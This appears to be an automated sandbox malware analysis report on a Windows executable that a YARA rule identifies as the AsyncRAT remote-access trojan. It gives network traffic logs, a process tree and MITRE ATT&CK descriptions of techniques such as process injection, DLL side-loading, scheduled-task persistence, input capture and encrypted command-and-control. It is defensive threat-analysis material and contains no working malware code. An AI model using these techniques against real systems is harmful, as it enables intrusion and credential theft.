2024-05-26 07:47:10 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=30161 Date: Sun, 26 May 2024 07:47:10 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-05-26 07:47:11 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-26 07:47:11 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=30082 Date: Sun, 26 May 2024 07:47:11 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-26 07:47:11 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-05-26 07:47:18 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-26 07:47:19 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 8e00e2e9-e607-4d71-b66a-7d21ef93f24a MS-RequestId: 1c93b072-2510-4daf-ad91-ecd7784fdfc5 MS-CV: QmAIPROwKE6oKINA.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 26 May 2024 07:47:18 GMT Connection: close Content-Length: 24490
2024-05-26 07:47:19 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-26 07:47:19 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-05-26 07:47:57 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-26 07:47:57 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440" MS-CorrelationId: d4567af6-5ba7-472f-95c9-4c9c340b7692 MS-RequestId: 30cbd379-2f69-4753-9eee-e30dc390fbff MS-CV: z1o+rqpICE22+ZgK.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sun, 26 May 2024 07:47:56 GMT Connection: close Content-Length: 25457
2024-05-26 07:47:57 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-26 07:47:57 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Target ID:	0
Start time:	03:46:57
Start date:	26/05/2024
Path:	C:\Users\user\Desktop\0pF5Vz4xG4.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\0pF5Vz4xG4.exe"
Imagebase:	0xb70000
File size:	6'596'488 bytes
MD5 hash:	769A1873247D5024808CF7BD70555B01
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	03:47:02
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	03:47:03
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	6
Start time:	03:47:04
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	03:47:05
Start date:	26/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0pF5Vz4xG4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Windows Analysis Report
0pF5Vz4xG4.exe

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre